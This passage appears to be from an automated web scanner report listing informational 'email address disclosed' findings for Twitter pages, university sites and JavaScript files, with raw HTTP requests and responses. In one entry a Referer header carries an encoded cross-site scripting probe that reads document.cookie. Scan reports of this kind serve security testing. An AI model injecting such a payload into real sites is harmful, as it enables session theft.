X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="entry-content">Send temp pictures to senditto7@whdh.com include the city the pic. was taken in for a slideshow, it might even go on air! Stay warm <a href="/search?q=%237NEWS" title="#7NEWS" class="tweet-url hashtag" rel="nofollow">
...[SNIP]...

24.120. http://twitter.com/7news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /7news

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-40880-22216
ETag: "edad7aa55a25b6aec0246521dae3ab7a"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.01998
Content-Type: text/html; charset=utf-8
Content-Length: 53571
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="entry-content">Send temp pictures to senditto7@whdh.com include the city the pic. was taken in for a slideshow, it might even go on air! Stay warm <a href="/search?q=%237NEWS" title="#7NEWS" class="tweet-url hashtag" rel="nofollow">
...[SNIP]...

24.121. http://twitter.com/cw56

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /cw56

Issue detail

The following email address was disclosed in the response:
  • senditto7@whdh.com

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910406-20060-45194
ETag: "ff97e4d20929a3ffbfd77d3c60c548db"
Last-Modified: Mon, 24 Jan 2011 23:06:46 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 55430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<span class="entry-content">Send temp pictures to senditto7@whdh.com include the city the pic. was taken in for a slideshow, it might even go on air! Stay warm <a href="/search?q=%237NEWS" title="#7NEWS" class="tweet-url hashtag" rel="nofollow">
...[SNIP]...

24.122. http://twitter.com/datasift

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /datasift

Issue detail

The following email address was disclosed in the response:
  • support@datasift.net

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964110-52502-21616
ETag: "98dfab6f65418ae81b99a43c3a15ba6b"
Last-Modified: Tue, 25 Jan 2011 14:01:50 GMT
X-Runtime: 0.41713
Content-Type: text/html; charset=utf-8
Content-Length: 46413
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</a> thanks for letting me know we'll try to get that fixed asap. In the meantime drop me an e-mail support@datasift.net to reset</span>
...[SNIP]...

24.123. http://twitter.com/typekit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /typekit

Issue detail

The following email address was disclosed in the response:
  • support@typekit.com

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964132-61803-46798
ETag: "2d1d82c342cf698a8f46318662e78b68"
Last-Modified: Tue, 25 Jan 2011 14:02:12 GMT
X-Runtime: 0.01489
Content-Type: text/html; charset=utf-8
Content-Length: 43545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</a> That shouldn't happen; drop a line to support@typekit.com with the URL to your site so we can take a look.</span>
...[SNIP]...
</a> Let us know if we can help: support@typekit.com</span>
...[SNIP]...
</a> We support wildcards and .local; drop a line to support@typekit.com and we'll be happy to help.</span>
...[SNIP]...

24.124. http://twitter.com/ups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ups

Issue detail

The following email address was disclosed in the response:
  • twitter@ups.com

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964085-20547-5536
ETag: "85433ba8bcb16420f3ea185c5d7c6195"
Last-Modified: Tue, 25 Jan 2011 14:01:25 GMT
X-Runtime: 0.01379
Content-Type: text/html; charset=utf-8
Content-Length: 52371
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964083613063; path=/; expires=Tue, 01-Feb-11 14:01:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596408557745250; path=/; expires=Thu, 24 Feb 2011 14:01:25 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTYxMDFiNjg3MGUwYWZiNDYxNDkyZGM1NTZiMTIxZGJjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsISp16vS0B--e1e310d0e3c9c2bde665bf97fbd81a7490ab10e3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</a> We're here to help. Please send your contact info + account # to twitter@ups.com and we will follow up.</span>
...[SNIP]...
</a> Apologies. Please send your contact info + tracking # to twitter@ups.com and we'll follow up.</span>
...[SNIP]...

24.125. http://ubh.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ubh.sourceforge.net
Path:   /

Issue detail

The following email address was disclosed in the response:
  • gerard@users.sourceforge.net

Request

GET / HTTP/1.1
Host: ubh.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:41 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 03 Feb 2007 18:10:24 GMT
ETag: "2a6e-428965fc82400"
Accept-Ranges: bytes
Content-Length: 10862
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 16:02:41 GMT


<!doctype html public "-//IETF//DTD HTML//EN">

<HTML>

<HEAD>


<TITLE>ubh - Home</TITLE>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...
<A HREF="mailto:gerard@users.sourceforge.net">
...[SNIP]...

24.126. http://venedet.michnica.net/media/system/js/mootools-more.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://venedet.michnica.net
Path:   /media/system/js/mootools-more.js

Issue detail

The following email addresses were disclosed in the response:
  • erik@domain.com
  • espen@domene.no
  • fred@domain.com
  • fred@domain.hu
  • fred@domaine.com
  • fred@domein.nl
  • fred@dominio.com
  • jan@domena.pl
  • maria@bernasconi.ch
  • matti@meikalainen.com
  • max@mustermann.de
  • name@domain.com
  • nome@dominio.com

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: venedet.michnica.net
Proxy-Connection: keep-alive
Referer: http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu?57476%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e3231f45f59c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa5a1b42d3949309610b52593e36fa6f=5bee479ce7f93991cea282d14030843c

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:09:28 GMT
Server: Apache
Vary: Host
Last-Modified: Tue, 11 Jan 2011 21:16:49 GMT
ETag: "cda0fc-36c85-499989a42f240"
Accept-Ranges: bytes
Content-Length: 224389
Content-Type: application/javascript

MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...

24.127. http://whdhstore.hipcricket.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whdhstore.hipcricket.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • support@hipcricket.com

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Content-Length: 19423
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSTATBQ=FMADLDFCELMBEGBAHKIFEOLO; path=/
Cache-control: private


<style type="text/css">
/* classic styles pulled in from old template - using arial instead of TNR */
td {font-family:Arial; font-size:12px;color:#000000;}
p {font-family:Arial; font-size:12px;}
...[SNIP]...
</b> to 88709 for information, or contact support@hipcricket.com, 1-866-HIP-CRIK (866.447.2745).


</td>
...[SNIP]...

24.128. http://widgets.twimg.com/j/2/widget.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.css

Issue detail

The following email address was disclosed in the response:
  • dustin@twitter.com

Request

GET /j/2/widget.css HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "9842b420d8c91a4cbb004d17a5d54054"
If-Modified-Since: Tue, 14 Dec 2010 23:10:03 GMT

Response

HTTP/1.0 200 OK
x-amz-id-2: EGWBkhJRtQkDVupkcmkaSoV7wa3qBtou2RcZFfVgr3IWQ4FhGTwapCvXdV7NTaqP
x-amz-request-id: 56D9424480C1667F
Date: Fri, 21 Jan 2011 01:03:15 GMT
Last-Modified: Tue, 14 Dec 2010 23:10:03 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 61194
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 523997ad92795ec47088daa080f5256d49f50a46cda43a67b48a722373c64af5961ab058c079ced2
Via: 1.0 389a96c30b7b40b8998a142737da95e1.cloudfront.net:11180 (CloudFront), 1.0 ee223c9485216db689cd5d610eaee715.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

24.129. http://widgets.twimg.com/j/2/widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response:
  • dustin@twitter.com

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "c02141e97f0cc82d13608bbc020f8322"
If-Modified-Since: Tue, 14 Dec 2010 23:09:56 GMT

Response

HTTP/1.0 200 OK
x-amz-id-2: +nDSdc8fBWJz685Vfcm5xJb65QpQfrCI1Pb7elhqajEjhzWfZrMSzlTQjyKMhXKN
x-amz-request-id: 3777807EE792CDAD
Date: Fri, 21 Jan 2011 17:44:48 GMT
Last-Modified: Tue, 14 Dec 2010 23:09:56 GMT
ETag: "c02141e97f0cc82d13608bbc020f8322"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 29952
Server: AmazonS3
Age: 23589
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 85beeaf9509661af25f261ab4dc0ed6570d49e24d8444699d6778f9d7622d3dc5d1e7c01b8cc9897
Via: 1.0 b6a19ce57eb7f67ba86fc485bfe1effb.cloudfront.net:11180 (CloudFront), 1.0 ee223c9485216db689cd5d610eaee715.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

24.130. http://www.aerotrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aerotrader.com
Path:   /sell/

Issue detail

The following email address was disclosed in the response:
  • customerservice@aerotrader.com

Request

GET /sell/ HTTP/1.1
Host: www.aerotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:15 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 31681


<!-- dstolweb02-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Aircraft, Real Estate or Trade - AeroTrader.com</title>
   <meta na
...[SNIP]...
<a href="mailto:customerservice@aerotrader.com">
...[SNIP]...

24.131. http://www.americascupmedia.com/scripts/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:
  • klaus.hartl@stilbuero.de

Request

GET /scripts/jquery.cookie.js HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:32 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2010 09:00:35 GMT
ETag: "20c4781-f61-4899aa78012c0"
Accept-Ranges: bytes
Content-Length: 3937
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

24.132. http://www.americascupmedia.com/scripts/overlib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /scripts/overlib.js

Issue detail

The following email address was disclosed in the response:
  • erik@bosrup.com

Request

GET /scripts/overlib.js HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:32 GMT
Server: Apache
Last-Modified: Tue, 22 Jun 2010 09:00:36 GMT
ETag: "20c479c-a013-4899aa78f5500"
Accept-Ranges: bytes
Content-Length: 40979
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript

//\////////////////////////////////////////////////////////////////////////////////////\ overLIB 3.50 -- This notice must remain untouched at all times.//\ Copyright Erik Bosrup 1998-2001. All rights reserved.//\ By Erik Bosrup (erik@bosrup.com). Last modified 2001-08-28.//\ Portions by Dan Steinman (dansteinman.com). Additions by other people are//\ listed on the overLIB homepage.//\//\ Get the latest version at http://www.bosrup.co
...[SNIP]...

24.133. http://www.aspirationtech.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aspirationtech.org
Path:   /

Issue detail

The following email address was disclosed in the response:
  • info@aspirationtech.org

Request

GET / HTTP/1.1
Host: www.aspirationtech.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:09:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSa1e859be48bff007359d1ff84a233b4d=e6592a496b2ea8707443b03c3285fa30; expires=Thu, 17-Feb-2011 17:42:23 GMT; path=/; domain=.aspirationtech.org
Last-Modified: Tue, 25 Jan 2011 14:09:03 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-C" lang="en-C">
<head>
<
...[SNIP]...
<a href="mailto:info@aspirationtech.org">info@aspirationtech.org</a>
...[SNIP]...

24.134. http://www.atvtraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /research/resources/

Issue detail

The following email address was disclosed in the response:
  • advertising@atvtraderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23440


<!-- dstolweb05-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>ATV Resources: Finance, Insurance, Shipping, and More - ATVTraderOnline.com</title>
   <m
...[SNIP]...
<a href="mailto:advertising@atvtraderonline.com">advertising@atvtraderonline.com</a>
...[SNIP]...

24.135. http://www.atvtraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atvtraderonline.com
Path:   /sell/

Issue detail

The following email address was disclosed in the response:
  • customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.atvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:24:07 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27006


<!-- dstolweb05-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used ATV fast - ATVTraderOnline.com</title>
   <meta name="description"
...[SNIP]...
<a href="mailto:customerservice@cycletrader.com">customerservice@cycletrader.com</a>
...[SNIP]...

24.136. http://www.aub.edu.lb/main/aub_files/Pages/contacts.aspx/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aub.edu.lb
Path:   /main/aub_files/Pages/contacts.aspx/x22

Issue detail

The following email addresses were disclosed in the response:
  • abuse@aub.edu.lb
  • admissions@aub.edu.lb
  • communications@aub.edu.lb
  • feedback@aub.edu.lb
  • follow_acd@aub.edu.lb
  • help@aub.edu.lb
  • registrar@aub.edu.lb
  • security@aub.edu.lb

Request

GET /main/aub_files/Pages/contacts.aspx/x22 HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:43 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Length: 91439
Content-Type: text/html; charset=utf-8
Expires: Mon, 24 Jan 2011 16:06:43 GMT
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
X-Cache: MISS from 193.188.129.14
Via: 1.1 www.aub.edu.lb
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html __expr-val-dir="ltr" dir="ltr">

<head><meta name="GENERATOR" content="Microsoft Share
...[SNIP]...
<a title="" href="mailto:communications@aub.edu.lb">
...[SNIP]...
<a href="mailto:admissions@aub.edu.lb">
...[SNIP]...
<a href="mailto:registrar@aub.edu.lb">
...[SNIP]...
<a href="mailto:follow_acd@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:help@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:feedback@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:abuse@aub.edu.lb">
...[SNIP]...
<a title="" href="mailto:security@aub.edu.lb">
...[SNIP]...

24.137. http://www.aub.edu.lb/tour/admissions/AUB-VR_196.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aub.edu.lb
Path:   /tour/admissions/AUB-VR_196.html/x22

Issue detail

The following email addresses were disclosed in the response:
  • feedback@aub.edu.lb
  • webmaster@aub.edu.lb

Request

GET /tour/admissions/AUB-VR_196.html/x22 HTTP/1.1
Host: www.aub.edu.lb
Accept: */*
Accept-Language: en
